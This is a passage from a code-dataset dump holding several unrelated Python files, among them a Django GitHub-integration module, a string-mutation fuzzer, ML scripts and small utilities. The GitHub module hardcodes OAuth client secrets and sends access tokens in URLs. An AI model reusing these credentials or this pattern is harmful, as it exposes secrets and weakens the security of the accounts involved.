basmith@email.arizona.edu\n\n\t\t\t\t This script will replace protein ID with a count ID'''))\nparser.add_argument(\"-i\", \"--input\", required = True,\n\t\t help = \"FASTA Amino Acids file required\")\nparser.add_argument(\"-o\", \"--output\", required = True,\n\t\t help = \"Desierd output file name\")\n\nargs = parser.parse_args()\n\nfile = open(args.input, 'r')\nout_file = open(args.output, 'w')\n\nline_count = 1\nfor line in file.readlines():\n\tif line.startswith(\">\"):\n\t\tline = \">\" + str(line_count)+\"\\n\"\n\t\tout_file.write(line)\n\t\tline_count += 1\n\telif not line.startswith(\">\"):\n\t\tout_file.write(line)\nfile.close()\n","sub_path":"mod_protein_id.py","file_name":"mod_protein_id.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"347582478","text":"import numpy as np\n\ndef Judger(dices):\n p1 = 0 \n p2 = 1\n draw = 2\n player1 = [dices[0], dices[1]]\n player2 = [dices[2], dices[3]]\n \n if(player1[0] == player1[1] and player2[0] == player2[1]):\n if(player1[0] == player2[0]):\n return draw\n elif(player1[0] > player2[0]):\n return p1\n else:\n return p2\n elif(player1[0] == player1[1]):\n return p1\n elif(player2[0] == player2[1]):\n return p2\n elif(np.sum(player1) == np.sum(player2)):\n return draw\n elif(np.sum(player1) > np.sum(player2)):\n return p1\n else:\n return p2 \na = 1\n\nc = 3\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"51600142","text":"from Jumpscale import j\n\n\nclass Package(j.baseclasses.threebot_package):\n def start(self):\n self.openresty.install()\n self.openresty.configure()\n\n for port in (443, 80):\n website = self.openresty.get_from_port(port)\n locations = website.locations.get(name=f\"admin_{port}\")\n\n admin_location = locations.get_location_static(\"admin\")\n admin_location.path_url = \"/admin\"\n admin_location.path_location = f\"{self._dirpath}/output\"\n admin_location.is_auth = True\n","sub_path":"ThreeBotPackages/zerobot/admin/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"111569148","text":"import pandas as pd\nfrom xgboost.sklearn import XGBClassifier\nimport operator\nimport numpy as np\nimport pickle\n\ntrain=np.loadtxt(\"train_stage2.csv\")\ntest=np.loadtxt(\"pred_stage2.csv\")\ntarget=pd.read_csv('target.csv',index_col=0)\nsubmission=pd.read_csv('SubmissionFormat.csv')\n\nest=XGBClassifier(max_depth=7,\n \tlearning_rate= 0.02358,\n \tn_estimators=189,\n \tgamma=0.07479,\n \tmin_child_weight=3.0666,\n \tsubsample=0.4970,\n \tcolsample_bytree=0.9517,\n \treg_alpha=0.2065,\n \tobjective='multi:softmax')\n\n\n\nest.fit(train,target['status_group'])\npath = 'save/est.pickle'\nfile = open(path,'wb')\npickle.dump(est,file)\npred=est.predict(test)\nimportances = est.booster().get_fscore()\nsorted_imp = sorted(importances.items(), key=operator.itemgetter(1))\n\noutput=np.chararray(len(pred), itemsize=30)\noutput[pred==0]='functional'\noutput[pred==1]='functional needs repair'\noutput[pred==2]='non functional'\n\n\nsubmission['status_group']=output\nsubmission.to_csv('output.csv',index=False)\n \n","sub_path":"final/src/experiment_code/liang_code/model2_code/train/Blending.py","file_name":"Blending.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440925390","text":"import json\n\nimport requests\nimport resume_yandex.betterapi as ba\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom resume_yandex import models\nfrom resume_yandex.models import GithubConnectedUsers, ProfileFullInfo, LangsInfo, EventsInfo, \\\n CommitsInfo, StarInfo, GithubSwiftInfo\n\n\ndef get_access_token(code, request):\n data = {'client_id': '89ba7814659aa83af19e',\n 'client_secret': '209e2c94999ee8de25628ab1f840f6566d546303',\n 'code': code, 'redirect_uri': 'https://resumecreator.ru/user/get_info/github'}\n r = requests.post(\n 'https://github.com/login/oauth/access_token', json=data)\n tmp = r.text\n if 'access_token' in tmp:\n get_info(tmp[13:53], request)\n\n\ndef get_swift_stats(request):\n ourid = User.objects.filter(username=request.GET['login']).values().first()['id']\n username = models.GithubConnectedUsers.objects.filter(authorid=ourid).values().first()[\n 'github_username']\n\n a = ba.get_user_events(username)\n repos_name = []\n\n data = []\n client_id_and_secret = \"?client_id=ea92b1a1958dd3d3e965&client_secret=2ee1ba9e4052deae4c79ba5c2b43cc0cadda2636\"\n url_tmp = \"https://api.github.com/users/\" + username + \"/repos\" + client_id_and_secret\n if len(GithubSwiftInfo.objects.filter(username=username).values()) > 0:\n repos_dict_with_full_info = json.loads(GithubSwiftInfo.objects.filter(username=username).values()[0]['data'])\n else:\n repos_json = (requests.get(url_tmp)).json()\n repos_count = len(repos_json)\n\n repos_dict_with_full_info = []\n\n for repo in repos_json:\n try:\n contributors_json = (\n requests.get('https://api.github.com/repos/' + username + '/' + repo[\n 'name'] + '/contributors' + client_id_and_secret)).json()\n repo_info_json = (\n requests.get(\n 'https://api.github.com/repos/' + username + '/' + repo[\n 'name'] + client_id_and_secret)).json()\n\n try:\n my_dict = {'name': repo['name'], 'language': repo_info_json['language'],\n 'commits': contributors_json[0]['contributions'],\n 'stars': repo_info_json['stargazers_count']}\n\n repos_dict_with_full_info.append(my_dict)\n except:\n pass\n except:\n pass\n obj = GithubSwiftInfo.objects.create(username=username,\n data=json.dumps(repos_dict_with_full_info),\n )\n obj.save()\n#\n copy_repos_dict_with_full_info = repos_dict_with_full_info\n\n count = 0\n for i in copy_repos_dict_with_full_info:\n count += 1\n if count > 5:\n break\n repos_name.append(i['name'][:6])\n data.append(i['commits'])\n\n langs = []\n stars = []\n langs_commit = []\n star_counter = 0\n commits_counter = 0\n languages_counter = 0\n langs_arr_counter = []\n repos_counter = 0\n most_popular_langs_in_git = [\"Javascript\", \"Python\", \"Java\", \"Ruby\", \"Php\", \"C++\", \"CSS\", \"C#\",\n \"Go\", \"C\"]\n our_popular = []\n our_not_popular = []\n\n for i in copy_repos_dict_with_full_info:\n repos_counter += 1\n if str(i['stars']) != '0':\n if i['language'] in langs:\n stars[langs.index(i['language'])] += int(i['stars'])\n else:\n langs_arr_counter.append(str(i['language']))\n languages_counter += 1\n\n langs.append(str(i['language']))\n langs_commit.append(0)\n stars.append(int(i['stars']))\n star_counter += int(i['stars'])\n commits_counter += int(i['commits'])\n if str(i['language']) in most_popular_langs_in_git:\n if str(i['language']) not in our_popular:\n our_popular.append(str(i['language']))\n else:\n if str(i['language']) not in our_not_popular:\n if str(i['language']) != 'None' and str(i['language']) != 'null' and str(i['language']) != 'HTML':\n our_not_popular.append(str(i['language']))\n\n for i in copy_repos_dict_with_full_info:\n for j in range(0, len(langs)):\n if i['language'] == langs[j]:\n langs_commit[j] += int(i['commits'])\n\n return JsonResponse(\n [repos_name, data, [\"lol\"], langs, stars, langs_commit, a[0], a[1], [str(star_counter)],\n [str(commits_counter)], [str(languages_counter)], [str(repos_counter)], our_popular,\n our_not_popular, langs_arr_counter], safe=False)\n\n\ndef test_for_swift_app(request):\n \"\"\" function for test_for_swift_app.\n \"\"\"\n login_from_app = request.GET['login']\n pass_from_app = request.GET['pass']\n\n this = User.objects.get(username=login_from_app)\n\n if this.check_password(pass_from_app):\n tmp = models.GithubConnectedUsers.objects.filter(authorid=this.id).values()\n\n return JsonResponse(list(tmp)[0], safe=False)\n return JsonResponse({'id': 'false'}, safe=False)\n\n\ndef get_info(access_token, request):\n repos = requests.get('https://api.github.com/user/repos?access_token=' + access_token).text\n user_info = requests.get('https://api.github.com/user?access_token=' + access_token)\n # (access_token)\n user_info = user_info.json()\n for key in user_info:\n if user_info[key] is None:\n user_info[key] = 'None'\n try:\n name = user_info['name']\n except KeyError:\n name = user_info['login']\n try:\n obj = GithubConnectedUsers.objects.filter(authorid=request.user.id).update(\n authorid=request.user.id,\n fullname=name,\n avatarurl=user_info['avatar_url'],\n orgs=requests.get(\n 'https://api.github.com/user/orgs?access_token=' + access_token),\n followers=user_info['followers'],\n repos_dict_with_full_info=repos,\n moreprofinfo=json.dumps(\n {'company': user_info['company'],\n 'location': user_info[\n 'location'],\n 'email': user_info['email'],\n 'bio': user_info['bio']}),\n access_token=access_token,\n github_username=user_info['login'],\n )\n GithubConnectedUsers.objects.filter(github_username=user_info['login']).update(\n access_token=access_token)\n if obj == 0:\n raise IndexError\n ProfileFullInfo.objects.filter(authorid=request.user.id).update(fullname=name,\n company=user_info[\n 'company'],\n address=user_info[\n 'location'],\n email=user_info['email'],\n about=user_info['bio'])\n LangsInfo.objects.filter(github=user_info['login']).update(flag=0)\n EventsInfo.objects.filter(github=user_info['login']).update(flag=0)\n CommitsInfo.objects.filter(github=user_info['login']).update(flag=0)\n StarInfo.objects.filter(github=user_info['login']).update(flag=0)\n except IndexError:\n obj = GithubConnectedUsers.objects.create(authorid=request.user.id,\n fullname=name,\n avatarurl=user_info['avatar_url'],\n orgs=requests.get(\n 'https://api.github.com/user/orgs?access_token=' + access_token),\n followers=user_info['followers'],\n repos_dict_with_full_info=repos,\n moreprofinfo=json.dumps(\n {'company': user_info['company'],\n 'location': user_info['location'],\n 'email': user_info['email'],\n 'bio': user_info['bio']}),\n access_token=access_token,\n github_username=user_info['login'],\n )\n obj.save()\n ProfileFullInfo.objects.filter(authorid=request.user.id).update(fullname=name,\n company=user_info[\n 'company'],\n address=user_info[\n 'location'],\n email=user_info[\n 'email'],\n about=user_info[\n 'bio'])\n","sub_path":"resume_project/resume_yandex/githubAPI.py","file_name":"githubAPI.py","file_ext":"py","file_size_in_byte":9615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"267601658","text":"from django import forms\nfrom member.models import Package\nimport selectable\nfrom lookups import *\n\n\nclass PackageSearchForm(forms.Form):\n\t# search = selectable.forms.AutoCompleteWidget(PackageLookup, label='', required=False)\n\tautocomplete = forms.CharField(\n label='',\n widget=selectable.forms.AutoCompleteWidget(PackageLookup, attrs={\"class\": \"input\", \"placeholders\":\"Enter your prefered number\"}),\n required=False,\n\n )\n\nclass FilterTwilioNumberSearchForm(forms.Form):\n\tarea_code = forms.CharField(max_length=3, \n required=False, \n label=\"Area Code\",\n widget=forms.TextInput(attrs={\"class\": \"input\"}))\n\n\tcountry = forms.CharField(max_length=3, \n required=False, \n label=\"Country\",\n widget=forms.TextInput(attrs={\"class\": \"input\"}))\n\t# sms_enabled = forms.BooleanField()\n\t# mms_enabled = forms.BooleanField()\n\t# voice_enabled = forms.BooleanField()","sub_path":"mytwilio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"311650394","text":"\"\"\"\nA random player selects moves randomly.\n\nLast update: 25 NOV 2018\n\"\"\"\nimport isolation\nimport random\n\n\nclass RandomPlayer(isolation.Player):\n \"\"\"\n A random player selects moves at random\n \"\"\"\n\n def __init__(self, name, token):\n \"\"\"\n Initialize this player\n :param name: This player's name\n :param token: This player's token\n \"\"\"\n super().__init__(name, token)\n\n def take_turn(self, board):\n \"\"\"\n Make a move on the isolation board\n :param board: an Board object\n :return: Return a Move object\n \"\"\"\n\n print(\"\\n{} taking turn: \".format(self._name), end='')\n\n # Collect board state info to generate a move from\n space_id = board.token_location(self._token)\n neighbors = board.neighbor_tiles(space_id)\n print('possible moves:', neighbors)\n tiled_spaces = board.push_outable_square_ids()\n\n # Select a square to move to and a tile to push out.\n # Once a neighbor square is chosen to move to,\n # that square can no longer be pushed out, but\n # the square vacated might be able to be pushed out\n to_space_id = random.choice(list(neighbors))\n tiled_spaces.discard(to_space_id)\n # if space_id not in board.start_squares():\n # tiled_spaces.add(space_id)\n tiled_spaces.add(space_id)\n print('possible push outs:', tiled_spaces)\n push_out_space_id = random.choice(list(tiled_spaces))\n\n # print(' Moving to', to_space_id, 'and pushing out', push_out_space_id)\n\n move = isolation.Move(to_space_id, push_out_space_id)\n print(' ', move)\n return move\n\n\nif __name__ == '__main__':\n # Create a match\n isolation.Board.set_dimensions(6, 8)\n match = isolation.Match(RandomPlayer('Blue', isolation.Board.BLUE_TOKEN),\n RandomPlayer('Red', isolation.Board.RED_TOKEN),\n isolation.Board())\n match.start_play()\n\n # # Play 100 more matches\n # for i in range(100):\n # match = isolation.Match(RandomPlayer('Blue', isolation.Board.BLUE_TOKEN),\n # RandomPlayer('Red', isolation.Board.RED_TOKEN))\n # print(match.start_play())\n # print('*' * 40)\n","sub_path":"Code/randomplayer.py","file_name":"randomplayer.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"585233616","text":"# -*- coding: utf-8 -*-\n\n'''\n通过pandas将csv写入mysql\n文档:http://pandas.pydata.org/pandas-docs/stable/io.html#sql-queries\n'''\n\n\nfrom glob import glob\nimport os.path\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\n# 连接数据库\nengine = create_engine('mysql+pymysql://root:root@localhost:3306/movies3')\n\n\ndef csv_to_mysql(path):\n df = pd.read_csv(path, sep=',')\n file_name = os.path.splitext(os.path.split(path)[1])[0]\n # 将新建的DataFrame储存为MySQL中的数据表,不储存index列\n df.to_sql(file_name, engine, chunksize=1000,\n if_exists='replace', index=False)\n print(\"Write {} to MySQL successfully!\".format(file_name))\n\n\nif __name__ == '__main__':\n csv_files = glob('ml-20m/*.csv')\n for path in csv_files:\n csv_to_mysql(path)\n","sub_path":"sql/pd_to_sql.py","file_name":"pd_to_sql.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"432967036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom base_app.classes.debug import Debug\nfrom base_app.models.mongodb.base_model import MongodbModel\n\n__author__ = 'Morteza'\n\n\nclass NewsComparativeQueueModel:\n def __init__(self):\n pass\n\n @staticmethod\n def get_all(agency=None, _code=None):\n try:\n __body = {\"code\": _code}\n if agency is not None:\n __body = {\"agency\": agency}\n r = MongodbModel(collection='news_comparative_queue', body=__body).get_all()\n result = [i for i in r]\n return result\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n\n @staticmethod\n def update_code(_id, _code):\n try:\n __body = {\"$set\": {\n \"code\": _code\n }}\n __condition = {\"_id\": _id}\n return MongodbModel(collection='news_comparative_queue', body=__body, condition=__condition).update()\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n\n @staticmethod\n def delete_code(_code):\n try:\n __body = {\"$set\": {\n \"code\": -1\n }}\n __condition = {\"code\": _code}\n __option = {\"multi\": True}\n return MongodbModel(collection='news_comparative_queue', body=__body, condition=__condition, option=__option).update_option()\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n","sub_path":"base_app/models/mongodb/news_comparative_queue/news_comparative_queue.py","file_name":"news_comparative_queue.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120660120","text":"#No this has nothing to do with pwlib\r\n#It's a way to get version information from archives and folders\r\nimport os\r\n\r\ndef cver(verstr):\r\n \"\"\"Converts a version string into a number\"\"\"\r\n if verstr.startswith(\"b\"):\r\n return float(verstr[1:])-100000\r\n return float(verstr)\r\n \r\ndef cver_t(verstr):\r\n \"\"\"Converts a version string into a tuple\"\"\"\r\n if verstr.startswith(\"b\"):\r\n return tuple([0,0,0,0]+list(cver_t(verstr[1:])))\r\n return tuple([int(x) for x in verstr.split(\".\")])\r\n \r\ndef cver_s(tup):\r\n \"\"\"Convert tuple version back to string\"\"\"\r\n tup = list(tup)\r\n while tup and not tup[-1]:\r\n del tup[-1]\r\n if not tup:\r\n return \"0.0\"\r\n if len(tup)==1:\r\n tup.append(0)\r\n return \".\".join([str(x) for x in tup])\r\n\r\ndef compare_versions(v1,v2):\r\n v1 = list(v1)\r\n v2 = list(v2)\r\n while len(v1)= (best.score / sum_fitness):\n best = c\n return best\n elif method == \"worst\":\n sum_fitness = 0.0\n for c in population:\n sum_fitness += c.score\n worst = Data(\"\")\n worst.score = 100\n for c in population:\n #print(\"{} {}\".format(c.data, (c.score / sum_fitness)))\n if (c.score / sum_fitness) <= (worst.score / sum_fitness):\n worst = c\n return worst\n\n def start(self):\n parent1 = None\n parent2 = None\n\n temp_pop = self.population.chromosomes\n\n while parent1 is None and parent2 is None:\n print(\"[+] Initiating parent selection\")\n parent1 = self.select(temp_pop, \"best\")\n temp_pop.remove(parent1)\n parent2 = self.select(temp_pop, \"best\")\n\n child1 = Data(parent1.data, parents=[parent1, parent2])\n child2 = Data(parent1.data, parents=[parent1, parent2])\n\n if random.random() <= 1.00:#self._prob_crossover:\n print(\"[+] Initiating crossover\")\n return self.crossover([child1, child2], [parent1, parent2])\n else:\n print(\"[+] Selection complete, children added to population\")\n self.population.chromosomes.append(child1)\n self.population.chromosomes.append(child2)\n return [child1, child2]\n\n def crossover(self, children, parents):\n\n loci = random.randint(0, len(parents[0].data) - 1)\n children[0].data = parents[0].data[:loci] + parents[1].data[loci:]\n children[1].data = parents[1].data[:loci] + parents[0].data[loci:]\n\n if random.random() <= 1.00:#self._prob_mutation:\n print(\"[+] Crossover complete, moving to mutation\")\n return self.mutate(children, \"Random\", 1, 1)\n else:\n print(\"[+] Crossover complete, children added to population\")\n self.population.chromosomes.append(children[0])\n self.population.chromosomes.append(children[1])\n return children\n\n\n def mutate(self, children, mutate_type, num_bytes, iterations):\n # If statement so that we dont have to specify\n # in the tool code what mutator we want to use\n # it is now a param for thie component.\n for child in children:\n if mutate_type == \"Standard\":\n print(\"[+] Fuzzing Standard style executed\")\n child.data = self.standard(data=child.data, iterations=iterations)\n elif mutate_type == \"Seq\":\n print(\"[+] Fuzzing Seq style executed\")\n child.data = self.seq_mutate(child.data, num_bytes, iterations)\n elif mutate_type == \"Random\":\n print(\"[+] Fuzzing Random style executed\")\n child.data = self.random_mutate(child.data, num_bytes, iterations)\n else:\n print(\"Your request is not a known mutation type\")\n print(\"[+] Mutation complete, adding children to population\")\n self.population.chromosomes.append(children[0])\n self.population.chromosomes.append(children[1])\n return children\n\n def breed(self):\n\n self.assess_all()\n\n children = self.start()\n\n self.assess_all()\n\n for child in children:\n print(\"{} {}\".format(child.data, child.ratio))\n\n\n def random_mutate(self, data,num_bytes,iterations):\n # The for loop is for num of iterations\n # then a nested for loop for num of bytes to chance at once\n # byte is set to random chr and index is any byte from 0,len(data)\n # Ex num_bytes = 2 ; iterations = 1;\n # og = \"AAAAAA\" mutated = \"A%AA@A\"\n for x in range(iterations):\n iter_data = data\n for y in range(num_bytes):\n byte = chr(random.randrange(0,256))\n index = random.randrange(0, len(data))\n iter_data = iter_data[:index] + byte + iter_data[index+1:]\n return iter_data\n\n\n\n def seq_mutate(self, data,num_bytes,iterations):\n for x in xrange(iterations):\n byte = chr(random.randrange(0,256))\n index = 0\n while index < len(data):\n # If statement to avoid writing more random bytes\n # than the file originally had.Ex\n # og = \"AAAAA\"\n if index+num_bytes <= len(data):\n return data[:index] + (byte * num_bytes) + data[index+num_bytes:]\n #A section bytes section C section\n else:\n print(\"Failed to mutate\")\n return data\n index = index + 1\n\n\n def standard(self, data, iterations):\n # The for loop is for num of iterations\n # byte is set to a random chr 0,256\n # index as well from 0,len(data)\n # Ex iterations = 1;\n # og = \"AAAAAA\" mutated = \"AAA@AA\"\n for x in xrange(iterations):\n byte = chr(random.randrange(0, 256))\n #print(byte)\n index = random.randrange(0, len(data))\n #print(index)\n if index in xrange(0, len(data)):\n return data[:index] + byte + data[:index]\n\n '''\n parser = argparse.ArgumentParser(description='File Mutation fuzzer.')\n\n parser.add_argument('--file',\n help = 'The file to operate the mutational fuzzing on',\n type = str,\n required = True,\n )\n parser.add_argument('--new_file',\n help = 'The file to save the changes to once completed',\n type = str,\n required = True,\n )\n\n parser.add_argument('--fuzztype',\n help = 'Fuzz Type either - Standard Seq(sequential) or Random',\n type = str,\n required = True,)\n\n parser.add_argument('--num_bytes',\n help = 'The number of bytes to operate on',\n type = int,\n required = False,\n )\n\n\n parser.add_argument('--iterations',\n help = 'The number of iterations to run during fuzzing',\n type = int,\n required = True,)\n\n\n \n args = parser.parse_args()\n \n print(\"USAGE: FILE.py --file --fuzztype\")\n with open(args.file, 'rb') as f:\n contents = f.read()\n \n \n print(args)\n print(args.file)\n print(args.new_file)\n print(args.fuzztype)\n print(args.num_bytes)\n print(args.iterations)\n num_bytes = args.num_bytes\n iterations = args.iterations\n mutate_type = args.fuzztype\n data = contents\n '''\n\n#mutate(data,mutate_type,num_bytes,iterations)\nif __name__ == '__main__':\n #mutate(data,mutate_type,num_bytes,iterations)\n data = Data(\"AAAAAAAA\")\n data.score = 5\n data1 = Data(\"AAAAAABB\")\n data1.score = 8\n data2 = Data(\"AAAABBBB\")\n data2.score = 2\n data3 = Data(\"AABBBBBB\")\n data3.score = 7\n\n p = God()\n p.population.chromosomes.append(data)\n p.population.chromosomes.append(data1)\n p.population.chromosomes.append(data2)\n p.population.chromosomes.append(data3)\n\n p.breed()\n\n\n\n\n","sub_path":"GenXFuzz/src/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":9261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"109552581","text":"import tkinter as tk\r\n\r\n\r\ndef fahrenheit_to_celsius():\r\n \"\"\"Convert the value for Fahrenheit to Celsius and insert the\r\n result into lbl_result.\r\n \"\"\"\r\n fahrenheit = ent_temperature.get()\r\n celsius = (5 / 9) * (float(fahrenheit) - 32)\r\n lbl_result[\"text\"] = f\"{round(celsius, 2)} \\N{DEGREE CELSIUS}\"\r\n\r\n\r\ndef celsius_to_fahrenheit():\r\n \"\"\"Convert the value for Celsius to Fahrenheit to and insert the\r\n result into lbl_result.\r\n \"\"\"\r\n celsius = ent_temperature.get()\r\n fahrenheit = (9 / 5) * (float(celsius)) + 32\r\n lbl_result[\"text\"] = f\"{round(fahrenheit, 2)} \\N{DEGREE FAHRENHEIT}\"\r\n\r\n\r\n# Set-up the window\r\nwindow = tk.Tk()\r\nwindow.title(\"Temperature Converter\")\r\nwindow.resizable(width=False, height=False)\r\n\r\n# Create the Fahrenheit entry frame with an Entry\r\n# widget and label in it\r\nfrm_entry = tk.Frame(master=window)\r\nent_temperature = tk.Entry(master=frm_entry, width=10)\r\n# lbl_temp = tk.Label(master=frm_entry, text=\"\\N{DEGREE FAHRENHEIT}\")\r\n\r\n# Layout the temperature Entry and Label in frm_entry\r\n# using the .grid() geometry manager\r\nent_temperature.grid(row=0, column=0, sticky=\"e\")\r\n# lbl_temp.grid(row=0, column=1, sticky=\"w\")\r\n\r\n# Create the conversion Button and result display Label\r\nbtn_convert_to_c = tk.Button(\r\n master=window,\r\n text=\"\\N{DEGREE FAHRENHEIT}\",\r\n command=fahrenheit_to_celsius\r\n)\r\n\r\nbtn_convert_to_f = tk.Button(\r\n master=window,\r\n text=\"\\N{DEGREE CELSIUS}\",\r\n command=celsius_to_fahrenheit\r\n)\r\nlbl_result = tk.Label(master=window, text=\"\")\r\n\r\n# Set-up the layout using the .grid() geometry manager\r\nfrm_entry.grid(row=0, column=0, padx=10)\r\nbtn_convert_to_c.grid(row=0, column=1, pady=10)\r\nbtn_convert_to_f.grid(row=0, column=2, pady=10)\r\nlbl_result.grid(row=0, column=3, padx=10)\r\n\r\n# Run the application\r\nwindow.mainloop()\r\n","sub_path":"Temp_Conv.py","file_name":"Temp_Conv.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"517746986","text":"def justify(line, length):\n\n #length variable is unnecessary\n #simply create an empty string, then build said string with '1234567890'\n #no additional data structures required, space complexity O(1)\n #while loop makes the solution O(n)\n\n spaces = \"\"\n buffer_size = 0\n line_length = len(line)\n\n if line_length < buffer_size:\n return spaces\n\n while buffer_size < line_length:\n spaces += \"1234567890\"\n buffer_size = len(spaces)\n\n return spaces\n\n\nif __name__ == '__main__':\n line = \"The quick brown fox jumps over the lazy dog.\"\n length = 52\n\n buff = justify(line, length)\n print(line)\n print(buff)","sub_path":"real_self_challenge.py","file_name":"real_self_challenge.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100359932","text":"\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nimport pandas as pd\nfrom numpy.random import RandomState\n\nfrom tools import rmse_cal,mae_cal,cor_cal,mean_cal,frange,accuracy,precision,recall,aupr,\\\n\t\tf1_score,make_binary\n\n\ndef regression_cv(n,model,data):\n# do the cross validation in regression problem\n# input => n: nfold, model, training data\n\n pred=pd.DataFrame()\n real=pd.DataFrame()\n\n data_t=data.iloc[:,1:].transpose()\n\n kf=KFold(n_splits=n,shuffle=True)\n prediction=pd.DataFrame(columns=['real','pred'])\n\n for train, test in kf.split(data_t):\n\n x_train=data_t.iloc[train,:-1].astype('float64').values\n y_train=data_t.iloc[train,-1].astype('float64').values\n model.fit(x_train,y_train)\n\n x_test=data_t.iloc[test,:-1].astype('float64').values\n y_test=data_t.iloc[test,-1].astype('float64').values\n\n pred=pred.append(pd.DataFrame(model.predict(x_test)))\n real=real.append(pd.DataFrame(y_test))\n\n prediction=pd.concat([real,pred],axis=1)\n\n rmse=rmse_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n mad=mae_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n cor=cor_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('rmse : '+str(rmse)+'\\nmad : '+str(mad)+'\\ncor : '+str(cor[0]))\n\n return prediction\n\ndef classification_cv(n,model,data):\n# do the cross validation in classification problem\n# input => n fold, model, training data\n\n pred=pd.DataFrame()\n real=pd.DataFrame()\n\n data_t=data.iloc[:,1:].transpose()\n\n kf=KFold(n_splits=n,shuffle=True)\n prediction=pd.DataFrame(columns=['real','pred'])\n\n y_data=data_t.iloc[:,-1]\n y_data=pd.DataFrame(data=make_binary('normal','cancer',y_data))\n\n\n for train, test in kf.split(data_t):\n\n x_train=data_t.iloc[train,:-1].astype('float64').values\n y_train=y_data.iloc[train,-1].values\n model.fit(x_train,y_train)\n\n x_test=data_t.iloc[test,:-1].astype('float64').values\n y_test=y_data.iloc[test,-1].values\n\n pred=pred.append(pd.DataFrame(model.predict(x_test)))\n real=real.append(pd.DataFrame(y_test))\n\n prediction=pd.concat([pred,real],axis=1)\n\n acc=accuracy(prediction.iloc[:,0],prediction.iloc[:,1])\n prec=precision(prediction.iloc[:,0],prediction.iloc[:,1])\n rec=recall(prediction.iloc[:,0],prediction.iloc[:,1])\n f1=f1_score(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('accuracy : '+str(acc)+'\\nprecision :'+str(prec)\n +'\\nrecall : '+str(rec)+'\\nf1_score : '+str(f1))\n\n return prediction\n\ndef test_preprocessing(test_df,dataset):\n# preprocess the test set for using same feature with training set\n# input => test data, trainng dataset\n\n if 'CpG_site' in test_df.columns:\n test_df.rename(columns={'CpG_site': 'Composite Element REF'}, inplace=True)\n elif 'ID_REF' in test_df.columns:\n test_df.rename(columns={'ID_REF': 'Composite Element REF'}, inplace=True)\n\n selected=pd.DataFrame(columns=['Composite Element REF'],data=dataset.iloc[:,0])\n raw_data=pd.merge(test_df,selected,how='right',on='Composite Element REF')\n\n raw_data=raw_data.replace('null',float('nan'))\n raw_data=raw_data.T.fillna(raw_data.mean(axis=1)).T\n raw_data.fillna(0.5,inplace=True)\n test_data=raw_data.transpose()\n\n return test_data\n\ndef external_val_reg(testdf,dataset,model):\n# do the external validation in regression problem\n# input : test data, training data, model\n\n prediction=pd.DataFrame(columns=['predict','real'])\n\n data_t=dataset.iloc[:,1:].transpose()\n X_data = data_t.iloc[:,:-1].values\n y_data = data_t.iloc[:,-1].values\n\n test_data=test_preprocessing(testdf,dataset)\n test_x=test_data.iloc[1:, :-1].astype('float64').values\n test_y=test_data.iloc[1:, -1].astype('float64').values\n\n model.fit(X_data,y_data)\n\n a=pd.DataFrame(model.predict(test_x))\n real=pd.DataFrame(test_y)\n prediction=pd.concat([a,real],axis=1)\n\n rmse=rmse_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n mae=mae_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n cor=cor_cal(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('rmse = '+str(rmse) +'\\nmae = '+str(mae)+'\\ncor = '+str(cor[0]) )\n\n return prediction\n\n\ndef external_val_classif(testdf,dataset,model):\n# do the external validation in classification problem\n# input test data, training data, model\n\n prediction=pd.DataFrame(columns=['predict','real'])\n\n data_t=dataset.iloc[:,1:].transpose()\n X_data = data_t.iloc[:,:-1].astype('float64').values\n y_data = data_t.iloc[:,-1]\n y_data=make_binary('normal','cancer',y_data).values\n\n tmp=dataset.iloc[:-1,:]\n test_data=test_preprocessing(testdf,tmp)\n test_x=test_data.iloc[1:, :].astype('float64').values\n test_y=testdf.iloc[-1, 1:]\n test_y=make_binary('normal','cancer',test_y).values\n\n model.fit(X_data,y_data)\n\n a=pd.DataFrame(model.predict(test_x))\n real=pd.DataFrame(test_y)\n 